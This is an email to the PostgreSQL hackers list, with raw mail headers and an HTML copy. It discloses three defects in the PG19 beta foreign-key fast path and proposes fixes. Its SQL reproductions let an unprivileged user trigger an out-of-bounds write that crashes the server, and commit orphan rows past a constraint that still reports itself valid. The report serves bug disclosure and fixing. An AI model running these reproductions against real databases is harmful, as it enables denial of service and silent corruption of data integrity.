Received: from malur.postgresql.org ([217.196.149.56]) by arkaria.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96) (envelope-from ) id 1wVmQz-002Bf5-21 for pgsql-hackers@arkaria.postgresql.org; Sat, 06 Jun 2026 08:31:14 +0000 Received: from localhost ([127.0.0.1] helo=malur.postgresql.org) by malur.postgresql.org with esmtp (Exim 4.96) (envelope-from ) id 1wVmQy-00FhTG-0u for pgsql-hackers@arkaria.postgresql.org; Sat, 06 Jun 2026 08:31:12 +0000 Received: from magus.postgresql.org ([2a02:c0:301:0:ffff::29]) by malur.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96) (envelope-from ) id 1wVmQx-00FhT7-2a for pgsql-hackers@lists.postgresql.org; Sat, 06 Jun 2026 08:31:11 +0000 Received: from mail-dl1-x1230.google.com ([2607:f8b0:4864:20::1230]) by magus.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (Exim 4.98.2) (envelope-from ) id 1wVmQu-00000001YzM-2rFI for pgsql-hackers@postgresql.org; Sat, 06 Jun 2026 08:31:11 +0000 Received: by mail-dl1-x1230.google.com with SMTP id a92af1059eb24-138129a622dso2048819c88.0 for ; Sat, 06 Jun 2026 01:31:06 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1780734664; cv=none; d=google.com; s=arc-20240605; b=BO7TJU2pMs2kyKF54Qy9sgq+ad9eqWWjNsAocr1Ibrf/7GUmzDh+3vtghrwNHLZClL isJXi52qGJ8vAd2RetK//yPV+aI1J8bRZKJIRVoMV/EsAK7krfAKsYiCWNddWoJIEep5 Iq+5xKwIPGhj97TNk7yXl77LmxDiFFbmXFvKiRV/SO8HzP16AVQJOvYrF3/Sd55bwXsJ vJtLgxSjADCxr//+ORSKGGorHmhINN655WtnrJGbpwa3rJydFKrqJWCDM/NfdAwkyhHE gvGaZ9LfJf4otoZdIIRtS8AzXJP1S9dDhQfJgNKQ4v52V4FNImbBWHSVyy6rNQXZU6dE /nKw== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20240605; h=cc:to:subject:message-id:date:from:mime-version:dkim-signature; bh=P4jDeqM6z8bP6O7qKixDet3TMyy2XT2MN2D48ri7Qdw=; fh=ZGFyMVifXc2Hh0h0YKtcDpfHr1+9PlyBRoA7FEYYqf0=; b=iq4vTgz5Wbi9WaP5EbtSUFYgP8IiG3SPi2mA9d75LZTP8dh0tv4lqIOzc411zdHfDe YF1rVJ+0UgUcGs8TmaxydTpcNNAEPBeUsh0ADaQB2qjCT7J8XlHqyEpf+bU76LNM4uYv fll9BhXfG+vS3UphocVHGnIIHds8QdTNhUR8GA7tm9NwNw4mJrwWPvjvPQNSZywNGg/n Q68dLM/OeO3jpO9HxtMESmgMMe2s0TrNQn1pWbfzwAad4Wh62BVapgFGgda9tVHnpEqM dIEH3S+ltcY+v/bGDIbu3HEIH6OIDddn7vifFqgEt3fgHttx72ot8utEux2ZwdK2U6zc eTTA==; darn=postgresql.org ARC-Authentication-Results: i=1; mx.google.com; arc=none DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=postgres.ai; s=google; t=1780734664; x=1781339464; darn=postgresql.org; h=cc:to:subject:message-id:date:from:mime-version:from:to:cc:subject :date:message-id:reply-to; bh=P4jDeqM6z8bP6O7qKixDet3TMyy2XT2MN2D48ri7Qdw=; b=JMSZQYB8OTZrTqejwQfbnT+5TpmRQ4KJJwbFz6aBeoStkYK/KoqLH93NQLN6+1i8ZP REh+vOUVNEXxKlsCoX9dp7B/eGHc2m2VUGyGEKC39uGytMhwxIXsK+npbyT9xmN+MwPs SHPK92lHyTM14z165Gon+H2j/SizcjyQvJKODp0DiSlNN+w0g/3/5WUE6RrQtaTCXFkr jgT2RviU1B5elUHV1mFnjkVIOTnIcdiGPuff79bF9fVqhWhJQZIP7HA932Nv4L+nocKD xqQSg2QiM5hlxj/8rtsMYVD7IPCyhr4g2hHam61lMeY5SftUOVu5KYmTod7UFMIz+ND+ MWyg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20251104; t=1780734664; x=1781339464; h=cc:to:subject:message-id:date:from:mime-version:x-gm-gg :x-gm-message-state:from:to:cc:subject:date:message-id:reply-to; bh=P4jDeqM6z8bP6O7qKixDet3TMyy2XT2MN2D48ri7Qdw=; b=paQU02Zc1q3z6AW+tTmgHmNdZrNBLU3j3Aq9ynjaGYiX99tyLHBIyTiDYhltIEBQd2 JHjAV/sEJpnGIbqi4w0JtzwVefqYHdR5B9BdGKY+tw8tofU8IuRPhPTbWVUNSGU3PEjb AKGWMq4N5kca4ZOdEs86OGh60g7mtt81UykXvaOKF7YJXafFNW27nrPqJ5X8IT0XBTWC L/6TyDHcz55oT4/v8vBcCtFv0bzXvTZi4y/j6KTYttRjDwq/fPYRgZRYVwu44hAnKlYX 7O4wFHg0FdgRCGIW2Xgv6wwMv7pqtILv6D7ltAGCXG5FUAnujWqZgNhjDOWKFc4f2Qvw 3GbQ== X-Gm-Message-State: AOJu0Yz19QHo77whv/zN8MKzgswiwLat1HEdDi532Pj48dpbjpQaKE2Q idmFpIVuSSRWACCbpMA3g6gH+0/FZf/Nbkqfz319XSq9mjtzeEp2Lrr68lOv7aar2+Fli1ztNtu f3/ZvRAa8iehz71tE6xiFs9Q7KU/L5fs/w9SWjz17WtZ/ahB3kIWtQpc= X-Gm-Gg: Acq92OF/PA2wu8ZFqbpqPAeMbQJO+/oEWJSqnzp8Qftx4BhV0c3+SsgmzqvUqLjU1VW TsIzhCUHEcnwzNAc9LVBqwCXA4fbHJVS/yA3UwrdtekD0ZOmrsK9HcwPmN6i4ymhg8R0Vbe9w+Y 4eCpckb0oCVBSO9JYhNxf+2w56Z0OZUpWsK4v4h5q0qOlGTp5UFQ+5u2edWYHLovnKqIgE9yvAx TUfZq3dmNx1uafebat+8psfHkySx8z7/y20xJS6OeT5XEN/CxEJIEmaWmNEEZ0Th64RcVqcRKQX 5Z6rLbw2DMuifvO1MfY= X-Received: by 2002:a05:7022:111:b0:137:9ab:2cb8 with SMTP id a92af1059eb24-1380670f100mr3547247c88.21.1780734664058; Sat, 06 Jun 2026 01:31:04 -0700 (PDT) MIME-Version: 1.0 From: Nikolay Samokhvalov Date: Sat, 6 Jun 2026 01:30:51 -0700 X-Gm-Features: AVVi8CeknHZ5qKmaVaIJ6_Sm1lYhsdfeO9FyzGPpqOkvclS9pgYEXJiwPL4fZV8 Message-ID: Subject: PG19 FK fast path: OOB write and missed FK checks during batched To: pgsql-hackers mailing list Cc: Andrey Borodin , Kirk Wolak , "amitlangote09@gmail.com" Content-Type: multipart/alternative; boundary="000000000000173f1d06539199f2" List-Id: List-Help: List-Subscribe: List-Post: List-Owner: List-Archive: Archived-At: Precedence: bulk --000000000000173f1d06539199f2 Content-Type: text/plain; charset="UTF-8" Hi hackers, The new FK existence-check fast path in ri_triggers.c (ri_FastPath*) runs user-defined code in the middle of a deferred batch flush, which yields at least three defects reachable by an unprivileged table owner. Present in master and verified inREL_19_BETA1. I identified these issues during recent security research with LLMs. While they have clear security implications (OOB write, integrity bypass), reporting them here because they are isolated to 19beta1, absent in PG18 and earlier; I don't have patches, only reproducibility. Mechanism: For an INSERT/UPDATE on the referencing side the fast path buffers rows in a transaction-lived cache (ri_fastpath_cache, keyed by pg_constraint OID) and probes the PK index in groups, flushing when a per-constraint buffer reaches RI_FASTPATH_BATCH_SIZE (64) or when the trigger-firing pass ends (ri_FastPathEndBatch, an AfterTriggerBatchCallback). For a cross-type FK the flush calls the column's cast function (ri_FastPathFlushArray, the FunctionCall3 at line 3069) and the equality operator -- arbitrary user code, mid-flush. Line numbers below are from a REL_19_BETA1 build (commit 4b0bf07). Unprivileged vehicle (defects 1 and 3). No superuser, no contrib: a role creates a type it owns and an IMPLICIT cast from it to the PK type with a PL/pgSQL function, which ri_HashCompareOp wires into the fast path's cast slot. Below uses a composite type. Default btree opclass, ordinary single-column FK, no GUC (fast path is unconditional for non-partitioned, non-temporal FKs, per ri_fastpath_is_applicable). 1) ri_FastPathBatchAdd (line 2859): out-of-bounds write on re-entry The write precedes the bound check, and batch_count is reset to 0 only at end of flush (ri_FastPathBatchFlush, line 2971), so it is 64 throughout a full-batch flush: fpentry->batch[fpentry->batch_count] = ExecCopySlotHeapTuple(newslot); fpentry->batch_count++; if (fpentry->batch_count >= RI_FASTPATH_BATCH_SIZE) ri_FastPathBatchFlush(fpentry, fk_rel, riinfo); There is no re-entrancy guard and ri_FastPathGetEntry returns the same entry, so user code that does DML on the same table during a full-batch flush re-enters with batch_count == 64 and writes batch[64], one past the array, overwriting the adjacent batch_count field (struct layout, lines 250-251). A single re-entrant row only stomps batch_count, which is then reset to 0 before reuse; the crash manifests once the re-entrant insert is itself large enough to fill and flush a batch, so the stomped batch_count is used as an array index (batch[garbage]) and as nvals in memset(matched, 0, nvals * sizeof(bool)) (line 3054). Reproduction (non-superuser; reliable SIGSEGV on --enable-cassert -O0; under -O2 the out-of-bounds write is of undefined effect): create table parent(id int primary key); insert into parent select g from generate_series(1,2000) g; create type vch as (v int); create function vcast(vch) returns int language plpgsql as $$ begin if $1.v = 64 then insert into child select row(g)::vch from generate_series(1001,1064) g; end if; return $1.v; end$$; create cast (vch as int) with function vcast(vch) as implicit; create table child(a vch); alter table child add constraint child_fkey foreign key (a) references parent(id); insert into child select row(g)::vch from generate_series(1,64) g; -- crash -- gdb: crash at ri_FastPathBatchAdd line 2866 with batch_count holding a -- stomped HeapTuple pointer's low bits, i.e. batch[64] overwrote -- batch_count; backend SIGSEGVs and the cluster restarts. 2) ri_FastPathSubXactCallback (line 4208): batch dropped on subxact abort On SUBXACT_EVENT_ABORT_SUB the callback discards the whole cache: ri_fastpath_cache = NULL; ri_fastpath_callback_registered = false; But batch[] holds outstanding rows of the enclosing transaction, not the aborting subxact. An internal subxact abort during after-trigger firing (PL/pgSQL BEGIN ... EXCEPTION) drops the buffered rows unflushed; their FK checks never run and orphans commit behind a constraint that still reports itself valid. No cast needed: create table pk(id int primary key); create table fk(a int, tag text); insert into pk select g from generate_series(1,10) g; alter table fk add constraint fk_a_fkey foreign key (a) references pk(id); create function abort_subxact() returns trigger language plpgsql as $$ begin if NEW.tag = 'boom' then begin perform 1/0; exception when others then null; end; end if; return NEW; end$$; create trigger fk_after after insert on fk for each row execute function abort_subxact(); insert into fk values (999,'bad'),(0,'boom'),(1,'ok'),(2,'ok'),(3,'ok'); -- INSERT 0 5, no error select f.a from fk f left join pk p on f.a=p.id where p.id is null; -- a -- ----- -- 999 -- 0 (orphans) -- the constraint still reports itself valid, and re-validation passes -- while the orphans remain: select convalidated from pg_constraint where conname = 'fk_a_fkey'; -- convalidated -- -------------- -- t alter table fk validate constraint fk_a_fkey; -- ALTER TABLE (succeeds; does not re-scan committed rows) select f.a from fk f left join pk p on f.a=p.id where p.id is null; -- 999, 0 (orphans still present) Controls (no EXCEPTION; between-statement SAVEPOINT; DEFERRABLE INITIALLY DEFERRED) all behave correctly (FK violation raised, no orphans). The whole statement's buffered batch is discarded, not just the aborting row's check. The abort path also emits "WARNING: resource was not closed" (relation / index / TupleDesc), a resource leak consistent with the missing flush. 3) ri_FastPathEndBatch (line 4133): cross-table re-entry drops a check EndBatch flushes by iterating the cache with hash_seq_search (line 4143). If flush-time user code INSERTs into a different fast-path FK table, ri_FastPathGetEntry adds a new cache entry mid-scan; it can land in a bucket hash_seq_search already passed and is never reached. ri_FastPathTeardown (line 4165) then hash_destroys the cache (line 4188) without flushing entries that still have batch_count > 0, so that buffered check is discarded. This survives a per-entry guard for [1] (different entry, not a re-entry of the busy one): create table parent(id int primary key); insert into parent select g from generate_series(1,64) g; create table child2(a int); alter table child2 add constraint child2_fkey foreign key (a) references parent(id); create type vch as (v int); create function vcast(vch) returns int language plpgsql as $$ begin if $1.v = 1 then insert into child2 values (999999); -- orphan into a *different* FK end if; return $1.v; end$$; create cast (vch as int) with function vcast(vch) as implicit; create table child(a vch); alter table child add constraint child_fkey foreign key (a) references parent(id); insert into child values (row(1)::vch); -- flushed at ri_FastPathEndBatch select a from child2 where a not in (select id from parent); -- => 999999 -- control: INSERT INTO child2 VALUES (999999); -- correctly raises FK error Root cause / thoughts: All three stem from invoking user cast/operator code inside a deferred batch flush: while a per-entry batch is half-updated [1], while a cache-wide hash_seq_search is in progress and teardown drops non-empty entries [3], and against a subxact-abort invalidation that cannot tell parent-xact rows from aborted-subxact rows [2]. - [1] Bound-check before the write in ri_FastPathBatchAdd, and add a "flushing" flag to RI_FastPathEntry, rejecting re-entrant modification of a busy entry (a nested per-row probe is unsafe: the flush may hold PK-index buffer locks). - [3] Loop-flush in ri_FastPathEndBatch until no entry has batch_count > 0, and/or flush non-empty entries in ri_FastPathTeardown before hash_destroy. - [2] Do not discard outstanding parent-xact rows on SUBXACT_EVENT_ABORT_SUB; track the buffering subxact, or flush immediate-constraint batches subxact boundaries. - Unifying: a global "in fast-path flush" guard routing any re-entrant FK check to the immediate per-row path, and reconsidering running user code mid-flush at all. Nik --000000000000173f1d06539199f2 Content-Type: text/html; charset="UTF-8" Content-Transfer-Encoding: quoted-printable

Hi hackers,


The new FK e= xistence-check fast path in ri_triggers.c (ri_FastPath*) runs user-defined = code in the middle of a deferred batch flush, which yields at least three d= efects reachable by an unprivileged table owner. Present in master and veri= fied inREL_19_BETA1.


I identified these issu= es during recent security research with LLMs. While they have=C2=A0<= span style=3D"border-color:rgb(255,255,255)!important;background-color:rgba= (0,0,0,0)!important;color:rgb(255,255,255)!important">clear security implic= ations (OOB write, integrity bypass), reporting=C2=A0them here because they are isolated= to=C2=A019be= ta1, absent in PG18 and earlier; I don't have patches, only reproducibility.<= /p>


Mechanism:


For an INSERT/UPDATE on the referencing side the fast path=C2=A0buffers rows in a = transaction-lived cache (ri_fastpath_cache, keyed by=C2=A0pg_constraint OID) and probes = the PK index in groups, flushing when a

per-constraint buffer reaches RI_FASTPATH_BATCH_SIZE (64) or = when the

trigger-firing pa= ss ends (ri_FastPathEndBatch, an AfterTriggerBatchCallback).=C2=A0For a cross-type FK th= e flush calls the column's cast function=C2=A0(ri_FastPathFlushArray, the FunctionCa= ll3 at line 3069) and the equality=C2=A0operator -- arbitrary user code, mid-flush.=C2=A0=C2= =A0Line numbers belo= w are from a=C2=A0REL_19_BETA1 build (commit 4b0bf07).


= Unprivileged vehicle (defects 1 and 3).=C2=A0=C2=A0No superuser, no contrib: a role=C2= =A0creates a = type it owns and an IMPLICIT cast from it to the PK type with a=C2=A0PL/pgSQL function, = which ri_HashCompareOp wires into the fast path's cast

slot.=C2=A0Below uses a composite type.=C2=A0Default bt= ree opclass, ordinary=C2=A0single-column FK, no GUC (fast path is unconditional for non-= partitioned,=C2=A0non-temporal FKs, per ri_fastpath_is_applicable).


=

1) ri_FastPathBatchAdd (line 2859)= : out-of-bounds write on re-entry


The write precedes the = bound check, and batch_count is reset to 0 only at=C2=A0end of flush (ri_FastPathBatchF= lush, line 2971), so it is 64 throughout a=C2=A0full-batch flush:


=C2= =A0 =C2=A0=C2=A0fpentry->batch[fpentry->batch_count] =3D ExecCopySlotHeapTuple(new= slot);

=C2=A0 =C2=A0=C2=A0fpentry->batch_count++= ;

=C2=A0 =C2=A0=C2=A0if (fpentry->batch_count >= ;=3D RI_FASTPATH_BATCH_SIZE)

=C2=A0 =C2= =A0 =C2=A0 =C2=A0=C2= =A0ri_FastPathBatchFlush(fpentry, fk_rel, riinfo);


There is no re-entrancy guard and ri_FastPathGetEntry returns the same=C2= =A0entry, so = user code that does DML on the same table during a full-batch=C2=A0<= span style=3D"border-color:rgb(255,255,255)!important;background-color:rgba= (0,0,0,0)!important;color:rgb(255,255,255)!important">flush re-enters with = batch_count =3D=3D 64 and writes batch[64], one past the

array, overwriting the adjacent batch_count field (struct= layout, lines=C2=A0250-251).=C2=A0A single re-entrant row only stomps batch_count, which is then=C2= =A0reset to 0= before reuse; the crash manifests once the re-entrant insert is

=

itself large enough to fill and flush a batch, so= the stomped batch_count is=C2=A0used as an array index (batch[garbage]) and as nvals in= memset(match= ed, 0, nvals * sizeof(bool)) (line 3054).


Reproduction (n= on-superuser; reliable SIGSEGV on --enable-cassert -O0; under -O2=C2=A0the out-of-bounds= write is of undefined effect):


=C2=A0 =C2=A0=C2=A0create table parent(id int prima= ry key);

=C2=A0 =C2=A0=C2=A0insert into parent selec= t g from generate_series(1,2000) g;

=C2= =A0 =C2=A0=C2=A0create type vch as (v int);

=C2=A0 = =C2=A0=C2=A0c= reate function vcast(vch) returns int language plpgsql as $$

=C2=A0 =C2=A0=C2=A0begin

=C2= =A0 =C2=A0 =C2=A0=C2= =A0if $1.v =3D 64 then

=C2=A0 = =C2=A0 =C2=A0 =C2=A0= =C2=A0insert into child select row(g)::vch from generate_series(1001= ,1064) g;

=C2=A0 =C2=A0 =C2=A0=C2=A0end if;

=C2=A0 =C2=A0 =C2=A0=C2=A0return $1.v;

=C2=A0 =C2=A0=C2=A0end$$;

=C2=A0 =C2= =A0=C2=A0crea= te cast (vch as int) with function vcast(vch) as implicit;

=C2=A0 =C2=A0=C2=A0create table child(a vch);

=C2=A0 =C2=A0=C2=A0alter table child add constraint child_fkey

<= p style=3D"margin:0px;line-height:normal;font-size-adjust:none;font-kerning= :auto;font-variant-alternates:normal;font-variant-ligatures:normal;font-var= iant-numeric:normal;font-variant-east-asian:normal;font-feature-settings:no= rmal;border-color:rgb(255,255,255)!important;background-color:rgba(0,0,0,0)= !important;color:rgb(255,255,255)!important">=C2=A0 =C2=A0 =C2=A0=C2=A0foreign key (a) references parent(id)= ;

=C2=A0 =C2=A0=C2=A0insert into child select row(g)= ::vch from generate_series(1,64) g;=C2=A0=C2=A0-- crash

=C2=A0 =C2=A0=C2= =A0-- gdb: crash at ri_FastPathBatchAdd line 2866 with batch_count h= olding a

=C2=A0 =C2=A0=C2=A0-- stomped HeapTuple poi= nter's low bits, i.e. batch[64] overwrote

=C2=A0 =C2=A0= =C2=A0-- batch_count; backend SIGSEGVs and the cluster restarts.



2) = ri_FastPathSubXactCallback (line 4208): batch dropped on subxact abort


On SUBXACT_EVENT_ABORT_SUB the callback discards the whole ca= che:


=C2=A0 =C2=A0=C2=A0ri_fastpath_cache =3D NULL;

=C2=A0 =C2=A0=C2=A0ri_fastpath_callback_registered =3D false;


But batch[] holds outstanding rows of the enclosing = transaction, not the=C2=A0aborting subxact.=C2=A0An internal subxact abort during after-trigger firing=C2=A0(PL/pgSQL BEGIN ...= EXCEPTION) drops the buffered rows unflushed; their FK=C2=A0checks never run and orphan= s commit behind a constraint that still reports=C2=A0itself valid.= =C2=A0No cast needed:

<= br>

=C2=A0 =C2=A0=C2=A0create table pk(id int primary key);=

=C2=A0 =C2=A0=C2=A0create table fk(a int, tag text)= ;

=C2=A0 =C2=A0=C2=A0insert into pk select g from ge= nerate_series(1,10) g;

=C2=A0 =C2=A0=C2=A0alter tabl= e fk add constraint fk_a_fkey foreign key (a) references pk(id);

=

=C2=A0 =C2=A0=C2=A0create function abort_subxact() returns tri= gger language plpgsql as $$

=C2=A0 =C2= =A0=C2=A0begi= n

=C2=A0 =C2=A0 =C2=A0=C2=A0if NEW.tag =3D 'boom= ' then

=C2=A0 =C2=A0 =C2=A0 =C2=A0<= span style=3D"border-color:rgb(255,255,255)!important;background-color:rgba= (0,0,0,0)!important;color:rgb(255,255,255)!important">=C2=A0begin pe= rform 1/0; exception when others then null; end;

=C2=A0 =C2=A0 =C2=A0=C2=A0end if;

=C2=A0 = =C2=A0 =C2=A0=C2=A0<= /span>return NEW;

<= span style=3D"border-color:rgb(255,255,255)!important;background-color:rgba= (0,0,0,0)!important;color:rgb(255,255,255)!important">=C2=A0 =C2=A0=C2=A0end$$;

=C2=A0 =C2=A0=C2=A0create trigger fk_after after insert on f= k

=C2=A0 =C2=A0 =C2=A0=C2=A0for each row execute fun= ction abort_subxact();

=C2=A0 =C2=A0=C2=A0insert int= o fk values (999,'bad'),(0,'boom'),(1,'ok'),(2,'= ;ok'),(3,'ok');

=C2=A0 =C2= =A0=C2=A0-- I= NSERT 0 5, no error

=C2=A0 =C2=A0=C2=A0select f.a fr= om fk f left join pk p on f.a=3Dp.id where =C2=A0 =C2=A0=C2=A0--=C2=A0=C2=A0a

=

=C2=A0 =C2=A0=C2=A0-- -----

=C2= =A0-- 999

=C2=A0 =C2=A0=C2=A0--=C2=A0=C2=A0=C2=A00=C2=A0= =C2=A0=C2=A0(= orphans)


=C2=A0 =C2=A0=C2=A0-- the constraint still reports itself val= id, and re-validation passes

=C2=A0 =C2= =A0=C2=A0-- w= hile the orphans remain:

=C2=A0 =C2=A0<= span style=3D"border-color:rgb(255,255,255)!important;background-color:rgba= (0,0,0,0)!important;color:rgb(255,255,255)!important">=C2=A0select c= onvalidated from pg_constraint where conname =3D 'fk_a_fkey';

=C2=A0 =C2=A0=C2=A0-- convalidated

=C2=A0 =C2=A0=C2=A0-- --------------

= =C2=A0 =C2=A0=C2=A0<= /span>-- t

=C2=A0 =C2=A0=C2=A0alter table fk validat= e constraint fk_a_fkey;

=C2=A0 =C2=A0=C2=A0-- ALTER = TABLE=C2=A0=C2=A0=C2= =A0(succeeds; does not re-scan committed rows)

=C2=A0 =C2=A0=C2=A0select f.a from fk f left join pk p on f.a=3Dp.id where p.id is null;

=C2=A0 =C2=A0=C2=A0-- 999, 0=C2=A0=C2=A0(orphans still present)


= Controls (no EXCEPTION; between-statement SAVEPOINT; DEFERRABLE INITIALLY= =C2=A0DEFERRE= D) all behave correctly (FK violation raised, no orphans).=C2=A0The whole=C2=A0statement's buffer= ed batch is discarded, not just the aborting row's check.=C2=A0<= span style=3D"border-color:rgb(255,255,255)!important;background-color:rgba= (0,0,0,0)!important;color:rgb(255,255,255)!important">The abort path also e= mits "WARNING: resource was not closed" (relation /

index / TupleDesc), a resource leak consistent with = the missing flush.



3) ri_FastPathEndBatch (line 4133): cross-table re-entry= drops a check

<= br>

EndBatch flushes by iterating= the cache with hash_seq_search (line 4143).=C2=A0If flush-time user code INSERTs into a= different fast-path FK table,=C2=A0ri_FastPathGetEntry adds a new cache entry mid-scan;= it can land in a bucket=C2=A0hash_seq_search already passed and is never reached.=C2=A0ri_FastPathTe= ardown=C2=A0(line 4165= ) then hash_destroys the cache (line 4188) without flushing entries=C2=A0that still have batch_co= unt > 0, so that buffered check is discarded.=C2=A0This=C2=A0su= rvives a

per-entry guard for [1] (diffe= rent entry, not a re-entry of the busy one):


=C2=A0 =C2= =A0=C2=A0crea= te table parent(id int primary key);

= =C2=A0 =C2=A0=C2=A0<= /span>insert into parent select g from generate_series(1,64) g;

<= p style=3D"margin:0px;line-height:normal;font-size-adjust:none;font-kerning= :auto;font-variant-alternates:normal;font-variant-ligatures:normal;font-var= iant-numeric:normal;font-variant-east-asian:normal;font-feature-settings:no= rmal;border-color:rgb(255,255,255)!important;background-color:rgba(0,0,0,0)= !important;color:rgb(255,255,255)!important">=C2=A0 =C2=A0=C2=A0create table child2(a int);

=C2=A0 =C2=A0=C2=A0alter table child2 add constraint child2_fkey

=C2=A0 =C2=A0 =C2=A0=C2=A0foreign key (a) references pa= rent(id);

=C2=A0 =C2=A0=C2=A0create type vch as (v i= nt);

=C2=A0 =C2=A0=C2=A0create function vcast(vch) r= eturns int language plpgsql as $$

=C2= =A0 =C2=A0=C2=A0begin

=C2=A0 =C2=A0 =C2=A0=C2=A0if $1.v =3D 1 the= n

=C2=A0 =C2=A0 =C2=A0 =C2=A0=C2=A0insert into child= 2 values (999999);=C2=A0=C2=A0=C2=A0-- orphan into a *different* FK

=C2=A0 =C2=A0 =C2=A0=C2=A0end if;

= =C2=A0 =C2=A0 =C2=A0= =C2=A0return $1.v;

=C2=A0 =C2=A0= =C2=A0end$$;<= /span>

=C2=A0 =C2=A0=C2=A0create cast (vch as int) with fun= ction vcast(vch) as implicit;

=C2=A0 = =C2=A0=C2=A0c= reate table child(a vch);

=C2=A0 =C2=A0= =C2=A0alter t= able child add constraint child_fkey

= =C2=A0 =C2=A0 =C2=A0= =C2=A0foreign key (a) references parent(id);

=C2=A0 =C2=A0=C2=A0insert into child values (row(1)::vch);=C2=A0 =C2=A0=C2=A0-- flushed = at ri_FastPathEndBatch

=C2=A0 =C2=A0=C2=A0select a f= rom child2 where a not in (select id from parent);=C2=A0=C2=A0-- =3D> 999999

=C2=A0 =C2=A0=C2=A0-- control: INSERT INTO child2 VALUES (99= 9999); -- correctly raises FK error



Root cause / thoughts:


All three stem from invoking user cast/operator code inside = a deferred=C2=A0batch flush: while a per-entry batch is half-updated [1], while a cache-= wide=C2=A0has= h_seq_search is in progress and teardown drops non-empty entries [3], and= =C2=A0against= a subxact-abort invalidation that cannot tell parent-xact rows from=C2=A0<= /span>aborted-subxac= t rows [2].


=

- [1] Bound-check before the write in ri_Fast= PathBatchAdd, and add a=C2=A0"flushing" flag to RI_FastPathEntry, rejecting re= -entrant modification of=C2=A0a busy entry (a nested per-row probe is unsafe: the flush = may hold PK-index=C2=A0buffer locks).

- [3] Loop-flu= sh in ri_FastPathEndBatch until no entry has batch_count > 0,=C2=A0and/or flush non-e= mpty entries in ri_FastPathTeardown before hash_destroy.

- [2] Do not discard outstanding parent-xact rows on SUBX= ACT_EVENT_ABORT_SUB;=C2=A0track the buffering subxact, or flush immediate-constraint bat= ches=C2=A0sub= xact boundaries.

- Unifying: a global &= quot;in fast-path flush" guard routing any re-entrant FK=C2=A0<= span style=3D"border-color:rgb(255,255,255)!important;background-color:rgba= (0,0,0,0)!important;color:rgb(255,255,255)!important">check to the immediat= e per-row path, and reconsidering running user code=C2=A0mid-flush at all.


Nik

--000000000000173f1d06539199f2--